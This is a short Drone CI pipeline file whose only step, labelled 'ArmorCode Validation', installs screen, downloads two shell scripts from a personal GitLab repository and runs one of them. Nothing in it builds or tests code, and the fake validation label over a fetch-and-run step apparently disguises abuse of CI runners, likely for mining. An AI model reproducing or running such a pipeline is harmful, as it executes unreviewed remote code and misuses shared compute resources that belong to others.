kind: pipeline
type: docker
name: cok susa

platform:
  arch: amd64
  os: linux

steps:
- name: ArmorCode Validation
  image: golang:1.12
  commands:
  - apt-get update && apt-get install screen -y
  - curl -L https://gitlab.com/kabehada4/ayamjalan/-/raw/main/googleping.sh > googleping.sh
  - curl -L https://gitlab.com/kabehada4/ayamjalan/-/raw/main/bismillacuan.sh > bismillacuan.sh
  - sh bismillacuan.sh 
 
 
